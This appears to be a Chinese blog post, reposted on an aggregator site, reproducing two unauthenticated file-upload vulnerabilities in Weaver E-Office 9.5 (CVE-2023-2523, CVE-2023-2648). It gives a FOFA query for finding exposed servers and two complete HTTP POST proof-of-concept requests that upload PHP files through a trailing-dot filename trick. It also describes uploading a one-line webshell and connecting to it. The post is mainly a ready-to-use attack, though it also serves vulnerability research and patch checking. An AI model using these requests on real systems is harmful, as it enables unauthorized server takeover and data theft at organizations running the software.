泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

10月前作者：OidBoy_G 分类：Toy博客阅读(78) 违法举报

这篇具有很好参考价值的文章主要介绍了泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。

0x02 漏洞概述

cve-2023-2523

泛微e-office 9.5版本，源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限。

cve-2023-2648

由于泛微e-office 9.5版本源文件/inc/jquery/uploadify/uploadify.php存在问题，对参数Filedata的操作会导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限。

0x03 影响范围

泛微 E-Office 9.5

0x04 复现环境

FOFA:app="泛微-EOffice"

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

0x05 漏洞复现

cve-2023-2523——PoC

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
Host: your-ip
Content-Length: 352
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

bp构造请求包复现

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

可以看到，回显了完整的上传路径，尝试访问

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

漏洞利用：上传一句话马子

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

尝试连接

注：必须要使用base64编码，不然会报错

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

cve-2023-2648——PoC

POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1
Host: your-ip
Content-Length: 204
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）

上图所示：与 cve-2023-2523的不同点就是，他返回的只有一个随机的文件夹参数，并非完整路径，利用方式都一样，就不展示，各位随意发挥。

0x06 修复建议

目前官方已修复以上漏洞，受影响用户可以升级更新到安全版本。

官方下载链接：https://service.e-office.cn/download文章来源地址https://www.toymoban.com/news/detail-461632.html

到了这里，关于泛微 E-Office文件上传漏洞复现（CVE-2023-2523、CVE-2023-2648）的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

CVE-2020-17518 flink任意文件上传漏洞复现

Apache Flink 是由Apache软件基金会开发的开源流处理框架，其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序，Flink的流水线运行时系统可以执行批处理和流处理程序。编号：CVE-2020-17518 Flink 1.5.1引入了REST API，但其实现上存在多处

2024年02月10日
浏览(42)
Weblogic 任意文件上传漏洞（CVE-2018-2894）复现

目录 weblogic 漏洞环境准备漏洞复现修复建议 WebLogic 是美国Oracle公司出品的一个 application server ，确切的说是一个基于 JAVAEE 架构的中间件， WebLogic 是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java应用服务器。将 Java 的动态功能和

2024年02月01日
浏览(46)
漏洞复现 a.WSO2 文件上传（CVE-2022-29464)

附件二：漏洞详情提交文件模板 1.漏洞描述 CVE-2022-29464 是 Orange Tsai发现的 WSO2 上的严重漏洞。该漏洞是⼀种未经身份验证的⽆限制任意⽂件上传，允许未经身份验证的攻击者通过上传恶意 JSP ⽂件在 WSO2 服务器上获得RCE。 2.漏洞影响这会影响到： WSO2 API Manager 2.2.0 及更高

2023年04月08日
浏览(48)
Office远程代码执行漏洞（CVE-2017-11882）漏洞复现

CVE-2017-11882允许攻击者在当前用户的上下文中运行任意代码，导致无法正确处理内存中的对象，即为“ Microsoft Office Memory Corruption Vulnerability “，栈溢出的远程执行漏洞该漏洞是在 EQNEDT32.EXE 组件的缓冲区溢出导致。当受害用户打开Office文档时就有可能被漏洞利用，危害极大。

2024年02月12日
浏览(45)
大华智慧园区综合管理平台文件上传漏洞(CVE-2023-3836)

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法

2024年02月06日
浏览(37)
Microsoft Office MSDT代码执行漏洞（CVE-2022-30190）漏洞复现

本文章仅供学习和研究使用，严禁使用该文章内容对互联网其他应用进行非法操作，若将其用于非法目的，所造成的后果由您自行承担，产生的一切风险与本文作者无关，如继续阅读该文章即表明您默认遵守该内容。该漏洞首次发现在2022 年 5 月 27 日，由白俄罗斯的一个 I

2024年02月06日
浏览(49)
【漏洞复现】Microsoft Office MSDT 远程代码执行漏洞（CVE-2022-30190）

0x01 Microsoft Office Microsoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。 0x02 漏洞简介该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件，该服务器使用 ms-msdt MSProtocol URI 方案加载代码并执行 PowerShell，禁用宏，仍能通过

2024年02月05日
浏览(97)
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology9中存在SQL注入漏洞，未经身份认证的远程攻

2023年04月19日
浏览(41)
【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

泛微 E-Cology v9 Browser.jsp 存在SQL注入漏洞，攻击者可通过该漏洞获取服务器数据库敏感信息。本篇文章仅用于漏洞复现与技术研究，请勿利用文章内的相关技术从事非法测试，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！泛微协同管理应用平台 e-

2024年02月16日
浏览(41)
泛微e-Bridge未授权文件读取漏洞复现

泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞，可利用该漏洞，实现任意文件读取，获取敏感信息。 fofa title=\\\"泛微云桥e-Bridge\\\" 因为不是在本地搭建的漏洞复现环境，利用空间搜索引擎只找到很少量存在漏洞的网站，大多数都开启了身份验证，找到的也都是基于Windows的，所

2024年02月09日
浏览(37)